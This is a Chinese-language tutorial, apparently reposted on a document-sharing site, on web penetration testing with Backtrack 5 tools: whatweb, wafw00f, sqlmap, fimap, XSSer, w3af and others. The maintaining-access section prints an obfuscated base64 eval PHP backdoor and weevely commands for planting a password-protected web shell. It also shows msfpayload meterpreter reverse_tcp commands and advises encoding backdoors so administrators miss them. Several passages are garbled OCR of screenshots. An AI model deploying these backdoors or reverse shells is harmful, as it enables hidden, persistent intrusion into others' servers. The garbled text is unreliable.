




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、用Backtrack进行渗透测试评估Web应用程序的分析在渗透测试和漏洞评估中发挥了重要的作用.确定Web应用程序的正 确信息(例如使用的插件,CMS类型等)都可以帮助测试者使用准确的漏洞来测试,能够降低 整个渗透测试漏洞评估所花费的时间.Backtrack 5包含很多渗透测试信息收集所需要的工具.主要有以下几个方面:CMS Identification(CMS 指纹鉴定)IDS/IPS Detection(IDS/IPS 的检测)Open Source Analysis(开源分析)Web Crawlers(网络爬虫)Vulnerability Assessment and Exploitat
2、ion(脆 弱性评估和开发)Maintaining Access(维护访问)1)CMS Identification(CMS 指纹鉴定):blindelephant cms-explorer whatwebBlindElephantBlind Elephant是一款基于python的Web应用程序指纹识别工具.这款工具通过扫描某些已 知位置的静态文件所使用的版本信息和hashes文件进行比对.Hashes文件中已经提前计算 了相关Web应用程序的版本信息.这款工具的优势是快速,非侵入性,低带宽和高度自动化 使用方法:BlindElephant.py options url appName不知道
3、Web应用程序或者插件的类型,我们可以用猜测的方法.例如;BlindElephant.py wordpressCMS-ExplorerCMS- Explorer是另外一款Web应用程序指纹识别工具,是用perl脚本编写的.它可以确定使 用的CMS类型,然后根据已知的漏洞资料进行攻击.这款工具有几个优势,可以从OSVDB(Open Source Vulnerability Database)中调用漏洞信息检查任何特定插件或者CMS 是否存在漏洞.使用方法:python cms-explorer.pl -url target -type type optionsWhatWebWhatWeb可以用来
4、确定服务器使用的CMS、博客平台、统计分析软件包JavaScript库等. 这个工具有超过900个插件用来扫描目标.使用方法:./whatweb 列出所有的插件用如下命令:./whatweb -l2)IDS/IPS detection(IDS/IPS 探测):在域环境下进行风险评估和渗透测试的时候,有可能会遇到有安装IDS/IPS的情况.IDS/IPS 有些时候能组织针对域环境的攻击.WAF(Web入侵防御系统)能很好的缓解入侵攻击.但是WAF是很容易能够检测到的,因为很多使用了基于签名的检测方法,因此攻击者可以通过对攻击参数进行编码来绕过WAF.Backtrack有两款检测IDS/IPS的工
5、具:waffitua-testerWaffitWaffit是一款Web应用防火墙检测工具,检测防火墙保护的站点是在渗透测试中非常重要的 一步.如果没有对WAF进行配置,有时候可能存在漏洞.在渗透测试和风险评估中分析WAF 也是非常重要的.通过编码攻击参数,可以绕过WAF.使用方法:wafw00f.py 3)Open-Source Analyses(开源代码分析):Open-Source Analyses(开放源码分析)可以使用 GHDB,revhosts,xssed,maltego.GHDB 和XSSed需要进入网站,其它的两款是工具.GHDBGHDB(Google Hacking Datab
6、ase)的 exploit-db的团队收集了大量漏洞信息库来方便渗透测 试人员.我们可以用服务器类型等信息来寻找相关的漏洞.例如:“Microsoft-IIS/6.0 intitle:index.of”可以用来搜索运行微软iis6.0的服务器.Google Hacking DatabaseSdect categoryACKING-! ATA ASEWeb Server DetectionTTiese link; merab;di州Unions ef+ectedr lr5.13 coBponnii openstFO.o.o Rt5 unpatchd -:-), j北屿BFlwmL 此4B5FVe
7、rs Un 5 Affeetod: 1,2.4 w Che cir: A pppn enls M o_5? f/Eptoit: NZAViilnarablt?心A* 28Inia -a CoHponnl; gqbio&la_firctiive catui Blind SCL Injection VkjlflerbilityVersions Aff&ctedt N/ACti&cfc: /co hpon em s/eaft_i joa ila_a reti i v e /index.php?op1iDn-con_ij。号1a_archive&task=archive&se*rch_archive-
8、Liactsea ixh&catid-l+snd+1-2Vulnsrable? YesW瞬还EW馅穿 i;::用海Exploit,Jmd弥,php?D()tiOh=cca2i 我够即易Mrth_Mchi我=1 &眦t责纹rcMc钗hM十Md+Xl :: /KiFTi5dn perl使用方法:./joomscan.pl -u or IP addressjoomscan可以扫描到安装的所有插件和相关的漏洞信息,利用这些信息我们可以进一步进 行攻击.sqlmapsqlmap是一款很不错的进行风险评估的工具.这款工具可以测试目标URL是否存在脆弱性 漏洞.下面这个例子中红色框中的参数Newid是具有脆
9、弱性漏洞的.使用方法如下:./sqlmap.py -u -fFimapFimap是一款基于python的工具,可以用来发现,代码审计,漏洞利用等.使用方法:二index.php-u定义目标URL扫描一个文本中的所有URL列表,命令如下:fimap -m -l /tmp/urlscan.txt-m批量扫描-l列表使用google批量搜索来扫描fimap.py -g -q inurl:include.php-g从Google搜索-q表示后面跟的是谷歌搜索的查询条件fimap可以利用目标漏洞,同时也可以上传交互式的shell.XsserXsser是一款自动的XSS漏洞检测和利用报告的框架.它配备了绕
10、过过滤器和其它注射方式 的选项.使用方法:./XSSer.py -u “”-g -user-agentcorrectaudit 这款工具提供了攻击的URL,浏览器和攻击方法等信息,一旦具有漏洞URL被检测完成,我们 可以打开网站,检查确认.theHarvestortheHarvestor工具用于收集用户的姓名,他们的电子邮件账户,主机名等信息,这款工具有助 于渗透测试人员在渗透测试和风险评估的初始阶段使用.使用方法:./theHaervester.py -Id target domain -d data sourceWtiwh.iwitCT - pythonFile Edit ViW Sook
11、maFks Mekirigsgkeirg ;玉1(专python thtHirviister.py iiciDili 200 -b goagltI I I 4 i i *1* w TOC o 1-5 h z ,Th巴HarvBster Ver- 2.0 (reborn)iCflded Christian Martor&Ua *sEdgfr-SeorLtjr Rsearchcia rtfl roVl - ty.coi *I -1 Searching in Gaugle:S&archtng 100 results rStarching 200 results._ _Searching 390muI
12、姑_一 一一二- 一 一i, -i.jDaila1. uption. -1. s -iiilab. nsl.i*DiilaB b ik .iaIb r BNs24*oila,1 fe BIjboila. i1+ &ails Dlind;ftlJQCMldE*3 HflflU fpwndr-i-d ion i-bt-ltiH ve-t?rr |蜜 思净L 庭件|澎渤心喧.另J或必WK:遂 W正在提取域和电子邮件相关的网站信息,可以帮助对有关目标的进一步攻击或研究.Shodan这是另外一款非常不错的评估工具,可以用来收集目标范围内的信息,比如链接在互联网上 的设备,可以搜索任何网络设备,如路由器,
13、网络电话,打印机,摄像等要搜索在域上运行 的任何服务,语法如下:Hostname: port:80,21,22或者干脆有关主机名的结果,如:Hostname:W3AFW3af是web代码审计和应用程序渗透测试工具。它分很多个模块,如攻击,审计,开发,暴力 破解.所以这些都是可以针对性的使用,例如我们可以选择审计模块的sqli选项,假设我们需 要执行审计类的特殊任务.下图显示了一个目标网站的简要流程图,使得我们更容易理解.一旦扫描完成,W3AF框架显示有关目标网站的漏洞信息,可以为进一步开发针对性的漏洞 利用工具提供帮助.一旦发现漏洞,我们可以配置插件中的Exploit标签,并进行进一步的攻击,
14、它可以帮助我们 得到一个目标网站的webshell.另外一个优点是w3af也是Metasploit下的一款工具,扫描的 结果可以导出为HTML的格式.6)Maintaining Access(维持访问):我们获取一个目标网站的权限之后,为了方便将来访闻我们需要保留一个后门,后门加密编 码非常的重要,主要是为了防止被管理员轻易的检测清除掉.Backtrack 5中上传webshell的经典工具有以下几款:weevelyWeevely是一款隐蔽的PHP后门.它提供一个类似telnet的链接,链接之后可以执行系统的 一些命令.使用动态探测系统绕过PHP的安全性限制.Weevely探测system。,
15、passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl-system(), python_eval() 这些函数,使用在远程服务器上启用的函数功能.下面的代码是使用weevely创建一个后门的 示例代码:eval(base64_decode(cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbC
16、hiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=。 );使用方法:创建一个后门Weevely.py -g -o filename -p password这样将创建一个具有特定名称和密码保护的后门,上传到目标服务器使用如下命令;Weevely.py -t -u http:/remote-ip/backdoor.php -p infosecMsfPayloadMetasploit工具可以用来创建后门,能够维持我们对目标服务器的访问.需要使用到 msfpayload这款工具.我们需要选择有效载荷,将通过反向链接生成一个shell,命令如下:msf msfpayload windows/meterpreter/reverse_tcp -R 来给输出文件 RAW 数据格式.Msf msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1234 RMsfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 付费频道合同5篇
- 农业项目入股合同范本
- 高一下学期语文期末考试试卷及答案
- 品牌营销在化妆品行业的应用
- 生物医学工艺流程研究
- 采矿技术员考试试题及答案
- 广电网络考试试题及答案
- 2025年计算机原理试卷及答案
- 2025年山东中小学教师招聘考试模拟试题及答案
- 2025年茶知识试题及答案
- 二年级数学下册口算天天练
- 有机化学课件(李景宁主编)第1章-绪论
- 全友导购员培训资料(机密)
- 白话译文《渔樵问对》(全篇)
- 医院消毒灭菌效果监测制度
- +GF+-SIGNET8850电导率变送器手册
- 大豆收购合同范本
- 2023学年完整公开课版水准仪认识
- 人文地理学(王恩涌)
- 教育学第五章教师与学生
- GB/T 5267.1-2002紧固件电镀层
评论
0/150
提交评论